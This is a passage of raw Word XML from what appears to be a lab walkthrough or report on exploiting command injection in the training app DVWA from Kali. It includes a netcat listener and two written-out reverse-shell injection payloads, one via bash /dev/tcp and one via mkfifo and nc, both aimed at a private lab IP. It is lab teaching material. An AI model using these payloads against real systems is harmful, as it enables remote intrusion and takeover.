          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">  DVWA </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">Security  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">  select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">Low  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">  Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F3FCD" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Browser step. Note in your report that Low = unfiltered baseline for the vulnerability class.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="03D0668E" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23BF7AA2" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FA366D5" wp14:editId="5AACBF70">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="111" name="Figure 9 - img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8"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CFB16EC" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77AB448E" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 10 — Command Injection — normal test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0072004A" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3081BE5F" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A normal ping result (baseline before the attack).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7111C9" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">page  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>enter  127.0.0.1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve">  Submit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18C4381B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Browser step. Screenshot the normal ping output.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="06EBBACB" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AA92B37" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3038FF29" wp14:editId="15A188B6">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="112" name="Figure 10 - img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9"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C69C11C" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20220DF7" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 11 — Start the listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E7873" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDFA4B3" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> listening on port 4444 (leave this window open).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BE4775" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="3DF2A781" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BC84B04" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71066629" wp14:editId="1D8A2E01">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="113" name="Figure 11 - img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0"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2110CB8B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5D5882" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 12 — Fire the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441931DE" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali browser (DVWA box)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159AE5CC" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The browser after submitting the injection (it will hang — that is expected).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E75E8" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>127.0.0.1; bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>/192.168.56.104/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AE4B55" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>If nothing connects, use instead: 127.0.0.1; rm /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>f;mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>f;cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/f|/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2&gt;&amp;1|nc 192.168.56.104 4444 &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
